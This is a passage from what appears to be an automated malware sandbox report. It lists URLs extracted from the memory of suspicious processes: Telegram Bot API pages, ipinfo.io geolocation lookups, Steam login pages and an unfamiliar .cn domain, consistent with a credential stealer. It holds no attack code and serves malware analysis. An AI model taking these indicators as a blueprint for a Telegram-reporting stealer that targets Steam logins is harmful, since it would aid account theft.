            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendinvoice
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendlocation
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendvenue
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#sendvideonote
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setchatadministratorcustomtitle
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setchatdescription
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setchatmenubutton
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setchatpermissions
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setchatstickerset
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setchattitle
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setgamescore
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setstickersetthumb
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#setwebhook
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#shareduser
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#shippingquery
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#startransaction
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#startransactions
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#story
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#textquote
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#transactionpartner
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#transactionpartnerfragment
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#transactionpartnerother
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#transactionpartnertelegramads
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2702275438.000001E7D9900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#transactionpartneruser
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#unhidegeneralforumtopic
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#userchatboosts
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689941950.000001E7D22A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#usersshared
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922858841.000001E7D2E24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#venue
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691245666.000001E7D28C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#videochatended
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#videochatparticipantsinvited
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#videonote
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2F6E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#webappdata
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922413448.000001E7D21B4000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D21C9000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000018.00000003.2341835832.000001BD49691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#webhookinfo
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921689164.000001E7D3601000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1921783319.000001E7D2D3B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/api#writeaccessallowed
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://core.telegram.org/bots/payments#supported-currencies
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://datetimetruncateip4:icmpdurationhttp/1.1getHoursgetMonth%d.%d.%dREJECTED
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connection
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1924564794.000001E7D3015000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://digitalassets.lib.berkeley.edu/sdtr/ucb/text/34.pdf
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.8/library/zipfile.html#path-objects
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2035482768.00000000031E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/icon?family=Material
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNa.woff)
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/materialiconsoutlined/v109/gok-H7zzDkdnRel8-DQ6KAXJ69wP1tGnf4ZGhUcY.woff
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/materialiconsoutlined/v109/gok-H7zzDkdnRel8-DQ6KAXJ69wP1tGnf4ZGhUcel5euI
            Source: j1XaE_3LRXkWT1prPdjt1dhT.exe, 0000000F.00000003.2589222539.000000000408A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gcc.gnu.org/bugs/):
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ActiveState/appdirs/issues/79
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2694398228.000001E7D3332000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923521936.000001E7D2113000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000018.00000003.2341835832.000001BD49691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/eternnoir/pyTelegramBotAPI/tree/master/examples
            Source: wab.exe, 00000004.00000003.1668118484.000000000889D000.00000004.00000020.00020000.00000000.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords0001020304050607080910111213141516171819202
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hukkin/mdformat-toc)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hukkin/tomli
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hukkin/tomli-w)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hukkin/tomli/actions?query=workflow%3ATests
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hukkin/tomli/blob/master/CHANGELOG.md
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/hukkin/tomli/workflows/Tests/badge.svg?branch=master)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2690702489.000001E7D25C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel/issues
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sdispater/tomlkit)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/toml-lang/compliance)
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/toml-lang/compliance/pull/8)
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steamp
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: BitLockerToGo.exe, 00000013.00000003.1979956654.000000000363A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2689816267.000001E7D2242000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1897524606.000001A4089A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/tomli)
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/404
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
            Source: file.exe, 00000000.00000002.1511871135.000001DC9B5B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://ipgeolocation.io/::
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/static/images/og_logo.png
            Source: wab.exe, 00000004.00000003.1454860522.0000000003540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D2100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipython.org
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1922174463.000001E7D2E6A000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2691422577.000001E7D2D00000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
